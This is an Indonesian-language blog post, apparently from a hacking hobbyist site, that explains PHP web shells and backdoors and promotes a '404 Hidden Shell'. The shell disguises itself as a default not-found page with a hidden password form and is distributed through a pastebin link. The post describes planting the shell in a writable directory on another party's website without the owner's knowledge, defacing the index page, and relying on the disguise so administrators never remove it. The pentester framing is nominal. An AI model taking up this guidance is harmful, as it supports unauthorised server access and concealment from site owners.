404 Hidden Shell
Shell / BackDoor oke , shell atau backdoor adalah , sebuah script , berupa PHP atau , perl, python,dll. Script tersebut berfungsi sebagai , pintu masuk para pentester , agar dapat masuk kedalam system suatu server , tanpa diketahui oleh pemilik server. Nah, cara masukknya bagaimana ? Caranya adalah dengan mengakses backdoor tersebut , atau mengexcute script tersebut, contoh apabila dengan PHP , caranya adalah dengan cara mengakses script PHP tersebut dimana script tersebut berada , contohnya , nama backdoor saya adalah cache2545.php , dan telah kita tanamkan pada suatu website , dengan url http://www.domain.com , dan kita upload cache2545.php
pada direktori yang writetable, katau dengan permission 0777,
sebagai contoh , direktori tersebut adalah /files , sehingga , untuk mengakses file backdoor kita , adalah dengan cara masuk ke url , http://www.domain.com/files/cache2545.php , nah dengan begitu , maka sang pentester sudah berada didalam system Server tersebut. dan , semua function pada server tersebut dapat di excute melalui backdoor tersebut , dalam contoh , sang pentester ingin mendeface website tersebut , maka yang dilakukan pentester tersebut adalah mengubah file index pada website tersebut. nah , sudah tau kan ? apa itu backdoor , atau shell ?
nah , kita tidak akan membahas lebih jauh tentang shell.
Yang akan saya bahas disini adalah 404 Hidden Shell , yang di ciptakan , oleh pentester dari hacker-newbie.org , dan kini sudah sangat sangat terkenal shell tersebut , memang shellnya sama saja , namun , ada perbedaan yang luar biasa pada shell tersebut ,
yaitu hidden , hiddennya bagaimana ? penasran ? Saya akan mencoba memberikan gambaran tentang 404 hidden shell tersebut , maksud dari hidden disini adalah , ketika mengakses shell tersebut , yang terjadi adalah 404 NOT FOUND , yaps , tampilannya sangat sangat mirip dan bahkan sama , dengan default not found page , namun , ada sekandal dibalik dari notfound tersebut, di bagian tengah not found page tersebut , ada sebuah form password , yap , form password , dan hidden , namun apabila di klik , maka yang terjadi adalah , muncul sebuah form login , ketika dimasukkan , maka anda masuk kedalam page / tampilan shell yang sesungguhnya , luar biasa bukan ? Kelebihan shell ini sangat sangat bermanfaat bagi para pentester. MENGAPA ? 1 Kata HIDDEN !! ,
Sehingga , 97% hidden shell yang telah ditanamkan pada sebuah server , tidak akan terhapus ,
karena kemampuan kamungflase nya, karena , oleh orang awam , shell tersebut hanyalah sebuah page 404. Nah ,
sekarang , saya akan membagikan script 404 hidden shell ini , dan selamat belajar , ingat !! jangan merusak !! karena kita adalah pentester , bukan HACKER !! Selalu duplicate file index , agar admin tidak kehilangan indexnya , terutama para admin yang malas melakukan BACKUP
langsung saja , hidden shell nya
http://www.pastebin.com/pXACCsW4
404 hidden shell , dengan PHP script , Selamat Belajar !!
0 komentar: